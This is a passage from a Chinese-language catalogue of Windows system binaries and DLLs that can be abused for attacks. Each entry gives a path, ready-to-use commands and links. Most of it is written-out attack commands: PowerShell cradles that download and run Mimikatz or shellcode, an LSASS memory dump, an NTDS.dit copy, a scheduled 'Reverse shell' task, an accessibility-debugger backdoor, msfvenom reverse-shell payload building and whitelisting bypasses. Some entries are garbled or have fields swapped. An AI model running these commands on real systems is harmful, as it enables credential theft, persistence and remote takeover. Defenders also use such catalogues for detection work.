- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- https://twitter.com/egre55/status/985994639202283520
复制代码 Findstr.exefindstr.exe它类似于find命令。findstr支持正则表达式,而find不支持。findstr程序最初作为Windows 2000 Resource Kit的一部分发布,名称为qgrep。 文件路径:
- C:\Windows\System32\findstr.exe
- C:\Windows\SysWOW64\findstr.exe
复制代码 执行方式:
- findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
- findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
- findstr /S /I cpassword \\sysvol\policies\*.xml
- findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
复制代码 参考资料:
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
复制代码 GfxDownloadWrapper.exe英特尔图形控制面板使用GfxDownloadWrapper.exe来进行远程文件下载,接收第一个参数URL和目标文件路径。 文件路径:
- c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\
- c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\
- c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\
复制代码 执行方式:
- C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
复制代码 参考资料:
- https://www.sothis.tech/author/jgalvez/
复制代码 Gpscript.exe组策略使用Gpscript.exe来处理脚本。 文件路径:
- C:\Windows\System32\gpscript.exe
- C:\Windows\SysWOW64\gpscript.exe
复制代码 执行方式:
- Gpscript /logon
- Gpscript /startup
复制代码 参考资料
- https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
复制代码 Hh.exehh.exe文件是其HTML帮助可执行程序,它是合法的Windows核心文件。通过单击文件或链接的菜单项打开“编译的帮助文件”(类型.chm)时,它将运行。通过调用HTML帮助ActiveX控件,它将使帮助文件在帮助查看器中打开。 文件路径:
- C:\Windows\System32\hh.exe
- C:\Windows\SysWOW64\hh.exe
复制代码 执行方式:
- HH.exe http://some.url/script.ps1
- HH.exe c:\windows\system32\calc.exe
复制代码 参考资料:
- https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
复制代码 Ie4uinit.exeIe4uinit.exe, Internet Explorer每用户初始化实用程序,它对图标缓存数据库执行操作,该图标缓存数据库是“%userprofile%\ AppData \ Local”子目录中的一个隐藏的“ .db”类型文件,图标缓存保留Windows或IE使用的图标副本,以避免重复重绘它们。 文件路径:
- c:\windows\system32\ie4uinit.exe
- c:\windows\sysWOW64\ie4uinit.exe
- c:\windows\system32\ieuinit.inf
- c:\windows\sysWOW64\ieuinit.inf
复制代码
执行方式:- ie4uinit.exe -BaseSettings
复制代码 参考资料
- https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
复制代码 Jsc.exejsc.exe是Microsoft Corporation开发的Microsoft®JScript .NET的一部分,用来将javascript代码编译为.exe或.dll格式的二进制文件。 文件路径:
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
复制代码 执行方式:
- jsc.exe scriptfile.js
- jsc.exe /t:library Library.js
复制代码 参考资料
- https://twitter.com/DissectMalware/status/998797808907046913
- https://www.phpied.com/make-your-javascript-a-windows-exe/
复制代码
Makecab.exeMakecab.exe用于将文件打包成Cabinet(.cab)文件。 文件路径: - C:\Windows\System32\makecab.exe
- C:\Windows\SysWOW64\makecab.exe
复制代码 执行方式:
- makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
- makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
复制代码 参考资料:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
复制代码 Mmc.exemmc.exe是系统管理程序的一个框架程序,全称是Microsoft Management Console,它提供给扩展名为msc的管理程序一个运行的平台,比如组策略,系统清单,任务管理器,以及打印管理、本地安全策略等等,另外本进程也可能同时运行两个或更多个。 文件路径:
- C:\Windows\System32\mmc.exe
- C:\Windows\SysWOW64\mmc.exe
复制代码 执行方式:
- mmc.exe -Embedding c:\path\to\test.msc
复制代码 参考资料:
- https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
复制代码 Msconfig.exemsconfig.exe用于查看、编辑和管理操作系统配置文件及随操作系统自动启动的程序/服务,包括:Win.ini、boot.ini、系统服务和自动启动程序等。 文件路径:
- C:\Windows\System32\msconfig.exe
复制代码执行嵌入在c:\windows\system32\mscfgtlc.xml中的命令。
参考资料:
- https://twitter.com/pabraeken/status/991314564896690177
复制代码
Msdt.exe文件路径
- C:\Windows\System32\Msdt.exe
- C:\Windows\SysWOW64\Msdt.exe
复制代码 执行方式:
- msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
复制代码 参考资料:
- https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
- https://twitter.com/harr0ey/status/991338229952598016
复制代码 Netsh.exeNetsh.exe 是一个管理员可以用来在命令提示符处配置并监视基于 Windows 的计算机的工具。使用 Netsh.exe 工具,可以将输入的上下文命令定向到适当的帮助器,然后帮助器将执行命令。帮助器是个动态链接库 (.dll) 文件,它通过提供配置、监视和支持一种或多种服务、实用工具或协议,来扩展 Netsh.exe 工具的功能。 文件路径:
- C:\WINDOWS\System32\Netsh.exe
- C:\WINDOWS\SysWOW64\Netsh.exe
复制代码 执行方式:
- netsh.exe add helper C:\Users\User\file.dll
复制代码 参考资料:
- https://freddiebarrsmith.com/trix/trix.html
- https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
- https://liberty-shell.com/sec/2018/07/28/netshlep/
复制代码 Pcwrun.exe程序兼容性疑难解答调用程序。 文件路径: - C:\Windows\System32\pcwrun.exe
复制代码 执行方式:
- Pcwrun.exe c:\temp\beacon.exe
复制代码 参考资料:
- https://twitter.com/pabraeken/status/991335019833708544
复制代码 Powershell.exeWindows PowerShell 旨在改进命令行和脚本环境。PowerShell以.NET Framework为平台,接收和返回.NET对象,此举为管理和配置微软系统带来了新的方法和工具。 文件路径:
- 64位版本:C:\ Windows \ System32 \ WindowsPowerShell \ v1.0
- 32位版本:C:\ Windows \ SysWOW64 \ WindowsPowerShell \ v1.0
复制代码 执行方式:
- a)、powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://x/1.jpg‘,'C:\Users\x\Desktop\test\12.exe')
- b)、powershell (Invoke-WebRequest http://x/1.jpg -O x.jpg)
- c)、也可以通过从UVC读取脚本执行:
- powershell -exec bypass -f \\webdavserver\a.ps1
- d)、内存加载:
- 1、powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
- 2、powershell -exec bypass -c "iwr https://gist.githubusercontent.com/Urahara3389/d83b6f9ccedf9aa53f70d987360dbc0e/raw/53ad790f87e0fd2c9449d5359358cd251c39297a/calc.ps1|iex"
- powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('cs shellcode address'))"
复制代码 参考资料:
- https://blog.csdn.net/a1453514850/article/details/88074300
复制代码
Print.exePrint.exe是Windows用来将文件发送到打印机的程序。 文件路径:
- C:\Windows\System32\print.exe
- C:\Windows\SysWOW64\print.exe
复制代码 执行方式:
- print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
- print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
- print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
复制代码 参考资料:
- https://twitter.com/Oddvarmoe/status/985518877076541440
- https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
复制代码 Reg.exereg.exe,用该命令向注册表加入一个新的指定键值 文件路径:
- C:\Windows\System32\reg.exe
- C:\Windows\SysWOW64\reg.exe
复制代码 执行方式:
- reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
复制代码 参考资料:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
复制代码 Regedit.exeregedit.exe是微软公司出品的一个进程文件。位于C:\Windows\目录,可用于修改Windows系统的注册表中的项,值以及数据。 文件路径:
- C:\Windows\System32\regedit.exe
- C:\Windows\SysWOW64\regedit.exe
复制代码 执行方式:
- regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
- regedit C:\ads\file.txt:regfile.reg
复制代码 参考资料:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
复制代码 Register-cimprovider.exe用于注册新的WMI提供程序。 文件路径:
- C:\Windows\System32\Register-cimprovider.exe
- C:\Windows\SysWOW64\Register-cimprovider.exe
复制代码 执行方式:
- Register-cimprovider -path "C:\folder\evil.dll"
复制代码 参考资料:
- https://twitter.com/PhilipTsukerman/status/992021361106268161
复制代码 Replace.exe命令行用于一个文件替换另一个文件。 文件路径: - C:\Windows\System32\replace.exe
- C:\Windows\SysWOW64\replace.exe
复制代码 执行方式:
- replace.exe C:\Source\File.cab C:\Destination /A
- replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
复制代码 参考资料:
- https://twitter.com/elceef/status/986334113941655553
- https://twitter.com/elceef/status/986842299861782529
复制代码 Rpcping.exe用于验证rpc连接。 文件路径:
- C:\Windows\System32\rpcping.exe
- C:\Windows\SysWOW64\rpcping.exe
复制代码 执行方式:
- rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
复制代码 参考资料:
- https://github.com/vysec/RedTips
- https://twitter.com/vysecurity/status/974806438316072960
- https://twitter.com/vysecurity/status/873181705024266241
复制代码 Runonce.exerunonce.exe是微软Run Once的包装。它用于第三方应用程序的安装程序。它允许安装程序添加到启动项中,用于再次启动后,进行进一步配置。这个程序对你系统的正常运行是非常重要的。 文件路径:
- C:\Windows\System32\runonce.exe
- C:\Windows\SysWOW64\runonce.exe
复制代码 执行方式:
- Runonce.exe /AlternateShellStartup
复制代码 参考资料:
- https://twitter.com/pabraeken/status/990717080805789697
- https://cmatskas.com/configure-a-runonce-task-on-windows/
复制代码 Runscripthelper.exe- 使用说明:runscripthelper.exe是在Windows 10 RS3中引入的,它所做的事情是从一个特定的目录读取PowerShell代码并执行这些代码。
文件路径: - C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
复制代码 执行方式:
- runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
复制代码 参考资料:
- https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
- http://www.4hou.com/technology/8999.html
复制代码 Sc.exe使用 Sc.exe 可以帮助开发的 Windows 服务。Sc.exe,资源工具包中提供实现对所有在 Windows 服务的控件应用程序编程接口 (API) 函数的调用。您可以通过在命令行上指定这些设置对这些函数的参数。Sc.exe 也显示服务状态,并检索存储在状态结构字段中的值。该工具还允许您指定的远程计算机名称,以便您可以调用服务 API 函数或查看远程计算机上的服务状态结构。 文件路径: - C:\Windows\System32\sc.exe
- C:\Windows\SysWOW64\sc.exe
复制代码 执行方式:
- sc create evilservice binPath=""c:\\ADS\\file.txt:cmd.exe" /c echo works > "c:\ADS\works.txt"" DisplayName= "evilservice" start= auto\ & sc start evilservice
复制代码 参考资料:
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
复制代码 Schtasks.exe- 使用说明:schtasks.exe是安排命令和程序定期运行或在指定时间内运行。从计划表中添加和删除任务,按需要启动和停止任务,显示和更改计划任务。
文件路径:
复制代码 执行方式:
- schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
复制代码 参考资料:
- https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
复制代码
Scriptrunner.exeScriptRunner.exe 被视为一种 Windows Executable 文件。它最常用于由 Microsoft 开发的 Microsoft (R) Windows (R) Operating System。它使用 EXE 文件扩展名, 并被视为 Win32 EXE (可执行的应用程序) 文件。 ScriptRunner.exe 最初开发于 07/29/2015,位于 Windows 10 操作系统中,适用于 Windows 10。此文件版本标记出来自Microsoft 的最新和最近更新版本。 文件路径:
- C:\Windows\System32\scriptrunner.exe
- C:\Windows\SysWOW64\scriptrunner.exe
复制代码 执行方式:
- Scriptrunner.exe -appvscript calc.exe
- ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
复制代码 参考资料:
- https://twitter.com/KyleHanslovan/status/914800377580503040
- https://twitter.com/NickTyrer/status/914234924655312896
- https://github.com/MoooKitty/Code-Execution
复制代码 Tttracer.exeTTTracer.exe,Microsoft的Time Travel工具,客户可以运行客户端版本来跟踪程序的流程。 文件路径:
- C:\Windows\System32\tttracer.exe
- C:\Windows\SysWOW64\tttracer.exe
复制代码 执行方式:
- tttracer.exe C:\windows\system32\calc.exe
复制代码 参考资料:
- https://twitter.com/oulusoyum/status/1191329746069655553
- https://twitter.com/mattifestation/status/1196390321783025666
- https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html
复制代码 Verclsid.exeverclsid.exe是Microsoft XP 安全更新程序 (KB908531)。Windows 资源管理器中有一个安全问题,攻击者可能会利用此问题危及基于 Windows 的系统的安全并获取对系统的控制权。 文件路径:
- C:\Windows\System32\verclsid.exe
- C:\Windows\SysWOW64\verclsid.exe
复制代码 执行方式:
- verclsid.exe /S /C {CLSID}
复制代码 参考资料:
- https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
- https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
复制代码 Wab.exe文件路径: - C:\Program Files\Windows Mail\wab.exe
- C:\Program Files (x86)\Windows Mail\wab.exe
复制代码 执行方式:
- 更改HKLM\Software\Microsoft\WAB\DLLPath并执行选择的DLL
- wab.exe
复制代码 参考资料:
- ttps://twitter.com/Hexacorn/status/991447379864932352
- http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
复制代码 wmic.exe- 使用说明:wmic.exe是WMI 命令行。作为 Windows XP 的一部分发布的 WMI 命令行工具 (wmic.exe) 提供一个到 WMI 基础结构的命令行接口。可以使用 wmic.exe 执行来自命令行的常见 WMI 任务,包括浏览 CIM 和检查 CIM 类定义。
文件路径: - C:\Windows\System32\wbem\wmic.exe
- C:\Windows\SysWOW64\wbem\wmic.exe
复制代码 执行方式:
- wmic.exe process call create "c:\ads\file.txt:program.exe"
- wmic.exe process call create calc
- wmic.exe process call create "C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f"
- wmic.exe /node:"192.168.0.1" process call create "evil.exe"
- wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
- wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
- wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
- wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
复制代码 参考资料:
- https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
- https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
- https://twitter.com/subTee/status/986234811944648707
复制代码 Wsreset.exeWindows应用商店重置工具。只需将二进制文件放在磁盘上,然后将其位置写入更正注册表项,然后运行WSReset.exe。二进制文件将以高特权运行。 文件路径:
- C:\Windows\System32\wsreset.exe
复制代码 执行方式:
参考资料:
- https://www.activecyber.us/activelabs/windows-uac-bypass
- https://twitter.com/ihack4falafel/status/1106644790114947073
- https://github.com/hfiref0x/UACME/blob/master/README.md
复制代码
系统库文件(10个)Advpack.dll使用rundll32.exe安装软件和驱动程序的实用程序 文件路径: - c:\windows\system32\advpack.dll
- c:\windows\syswow64\advpack.dll
复制代码 执行方式:
- rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
- rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
- rundll32.exe advpack.dll,RegisterOCX test.dll
- rundll32.exe advpack.dll,RegisterOCX calc.exe
- rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
复制代码 参考资料:
- https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
- https://twitter.com/ItsReallyNick/status/967859147977850880
- https://twitter.com/bohops/status/974497123101179904
- https://twitter.com/moriarty_meng/status/977848311603380224
复制代码
Comsvcs.dll使用rundll32.exe执行Com+服务。 文件路径:
- c:\windows\system32\comsvcs.dll
复制代码 执行方式:
- rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
复制代码 参考资料:
- https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
复制代码 Ieadvpack.dll- 使用说明:用于Internet Explorer的INF安装程序。具有与advpack.dll相同的功能。
文件路径: - c:\windows\system32\ieadvpack.dll
- c:\windows\syswow64\ieadvpack.dll
复制代码 执行方式:
- rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
- rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
- rundll32.exe ieadvpack.dll,RegisterOCX test.dll
- rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
- rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
复制代码 参考资料:
- https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
- https://twitter.com/pabraeken/status/991695411902599168
- https://twitter.com/0rbz_/status/974472392012689408
复制代码 Ieaframe.dll- 使用说明:Internet浏览器DLL,用于翻译HTML代码。
文件路径:
- c:\windows\system32\ieframe.dll
- c:\windows\syswow64\ieframe.dll
复制代码
执行方式:
- rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
复制代码 参考资料:
- http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
- https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
- https://twitter.com/bohops/status/997690405092290561
- https://windows10dll.nirsoft.net/ieframe_dll.html
复制代码 Mshtml.dll文件路径:
- c:\windows\system32\mshtml.dll
- c:\windows\syswow64\mshtml.dll
复制代码 执行方式:
- rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
复制代码 参考资料:
- https://twitter.com/pabraeken/status/998567549670477824
- https://windows10dll.nirsoft.net/mshtml_dll.html
复制代码 Pcwutl.dll文件路径:
- c:\windows\system32\pcwutl.dll
- c:\windows\syswow64\pcwutl.dll
复制代码 执行方式:
- rundll32.exe pcwutl.dll,LaunchApplication calc.exe
复制代码 参考资料:
- https://twitter.com/harr0ey/status/989617817849876488
- https://windows10dll.nirsoft.net/pcwutl_dll.html
复制代码 stager.dll/stager.exe下载https://github.com/phackt/stager.dll 先使用msfvenom生成payload
- msfvenom -p windows/x64/encrypted_shell_reverse_tcp LHOST=192.168.1.24 LPORT=443 --encrypt aes256 --encrypt-iv E7a0eCX76F0YzS4j --encrypt-key 6ASMkFslyhwXehNZw048cF1Vh1ACzyyR -f c -o /tmp/meterpreter.c
复制代码 替换cpp文件中的payload,编译生成dll:
- cl /LD /MT /EHa stager_dll_xx.cpp aes.cpp /Fe:stager.dll
复制代码 也可以编译生成exe
- cl /MT /EHa stager_exe_xx.cpp aes.cpp /Fe:stager.exe
复制代码在靶机执行rundll32 stager.dll,Exec即可。
- https://github.com/phackt/stager.dll
- https://wh0ale.github.io/2019/01/23/2019-1-23-%E5%90%8E%E6%B8%97%E9%80%8F%E8%AF%A6%E8%A7%A3/
复制代码 Setupapi.dll文件路径:
- c:\windows\system32\setupapi.dll
- c:\windows\syswow64\setupapi.dll
复制代码 执行方式:
- rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf
复制代码 参考资料:
- https://github.com/huntresslabs/evading-autoruns
- https://twitter.com/pabraeken/status/994742106852941825
- https://windows10dll.nirsoft.net/setupapi_dll.html
复制代码 Shdocvw.dllshdocvw.dll是为Windows应用程序添加基础文件和网络操作相关模块 文件路径: - c:\windows\system32\shdocvw.dll
- c:\windows\syswow64\shdocvw.dll
复制代码 执行方式:
- rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
复制代码
参考资料:
- http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
- https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
- https://twitter.com/bohops/status/997690405092290561
- https://windows10dll.nirsoft.net/shdocvw_dll.html
复制代码
Shell32.dll- 使用说明:系统文件shell32.dll是存放在Windows\System32系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要。在正常情况下不建议用户对该类文件进行随意的修改,它的存在对维护计算机系统的稳定具有重要作用。
文件路径: - c:\windows\system32\shell32.dll
- c:\windows\syswow64\shell32.dll
复制代码 执行方式:
- rundll32.exe shell32.dll,Control_RunDLL payload.dll
复制代码 参考资料:
- https://twitter.com/Hexacorn/status/885258886428725250
- https://twitter.com/pabraeken/status/991768766898941953
- https://twitter.com/mattifestation/status/776574940128485376
- https://twitter.com/KyleHanslovan/status/905189665120149506
- https://windows10dll.nirsoft.net/shell32_dll.html
复制代码
Syssetup.dll- 使用说明:Windows NT系统安装dll文件。
文件路径: - c:\windows\system32\syssetup.dll
- c:\windows\syswow64\syssetup.dll
复制代码 执行方式:
- rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
- rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
复制代码 参考资料:
- https://twitter.com/pabraeken/status/994392481927258113
- https://twitter.com/harr0ey/status/975350238184697857
- https://twitter.com/bohops/status/975549525938135040
- https://windows10dll.nirsoft.net/syssetup_dll.html
复制代码
其他MS程序(21个)Appvlp.exeMicrosoft Office 2016附带的应用程序虚拟化实用程序。 文件路径:
- C:\Program Files\Microsoft Office\root\client\appvlp.exe
- C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
复制代码 执行方式:
- AppVLP.exe \\webdav\calc.bat
- AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
- AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
复制代码 参考资料:
- https://github.com/MoooKitty/Code-Execution
- https://twitter.com/moo_hax/status/892388990686347264
- https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
- https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
复制代码 Bginfo.exeBgInfo是SysInternals套件中的实用程序,它可以在桌面背景中直接显示计算机的系统信息。
- bginfo.exe bginfo.bgi /popup /nolicprompt
- \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
- \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
复制代码 参考资料:
- https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
- https://github.com/3gstudent/bgi-creater
复制代码 Cdb.exeWindows Debug工具包中的一个调试工具。 文件路径: - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
复制代码 执行方式:
- cdb.exe -cf x64_calc.wds -o notepad.exe
复制代码 参考资料:
- http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
- https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
- https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
复制代码 csi.exe和dnx一样csi和rcsi都可以执行C#代码,但csi是交互式的而rcsi不是。 文件路径:
- c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
复制代码 执行方式:
参考资料:
- https://web.archive.org/web/20161008143428/http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html
- https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
复制代码 Devtoolslauncher.exe- 使用说明:VS/VScode安装后引入的一个程序。
文件路径: - c:\windows\system32\devtoolslauncher.exe
复制代码 执行方式:
- devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test
- devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
复制代码 参考资料:
- https://twitter.com/_felamos/status/1179811992841797632
复制代码 dnx.exe.NET Execution Environment(DNX) 是一个SDK 和运行时环境,它包含所有的你需要创建和运行.net应用程序的组件。可以执行C#代码
参考资料:
- https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
复制代码 Dotnet.exe.NET Framework安装后引入的程序 文件路径: - C:\Program Files\dotnet\dotnet.exe
复制代码 执行方式:
参考资料:
- https://twitter.com/_felamos/status/1204705548668555264
复制代码 Dxcap.exeVisual Studio中自带的DirectX诊断调试工具。 文件路径:
- C:\Windows\System32\dxcap.exe
- C:\Windows\SysWOW64\dxcap.exe
复制代码 执行方式:
- https://twitter.com/harr0ey/status/992008180904419328
复制代码 参考资料:
- Dxcap.exe -c C:\Windows\System32\notepad.exe
复制代码 Excel.exe- 使用说明:Microsoft Office 表格程序。
文件路径: - C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
- C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
- C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
- C:\Program Files\Microsoft Office\Office16\Excel.exe
- C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
- C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
- C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
- C:\Program Files\Microsoft Office\Office15\Excel.exe
- C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
- C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
- C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
- C:\Program Files\Microsoft Office\Office14\Excel.exe
- C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
- C:\Program Files\Microsoft Office\Office12\Excel.exe
- C:\Program Files\Microsoft Office\Office12\Excel.exe
复制代码 执行方式:
- Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
复制代码 参考资料:
- https://twitter.com/reegun21/status/1150032506504151040
- https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
复制代码 Mftrace.exe- 使用说明:Media Foundation Tools的跟踪日志生成工具。
文件路径:
- C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
- C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
- C:\Program Files (x86)\Windows Kits\10\bin\x86
- C:\Program Files (x86)\Windows Kits\10\bin\x64
复制代码 执行方式:
参考资料:
- https://twitter.com/0rbz_/status/988911181422186496
复制代码 msxsl.exe根据Microsoft的msxsl.exe命令行程序,用户能够使用Microsoft XSL处理器执行命令行可扩展样式表语言(XSL)。但是,这个二进制文件可以用来执行恶意的JavaScript代码并绕过应用程序白名单保护。
- msxsl.exe customers.xml script.xsl
- msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
复制代码 参考资料:
- https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- https://twitter.com/subTee/status/877616321747271680
- https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
复制代码 Powerpnt.exe- 使用说明:Microsoft Office 的ppt程序。
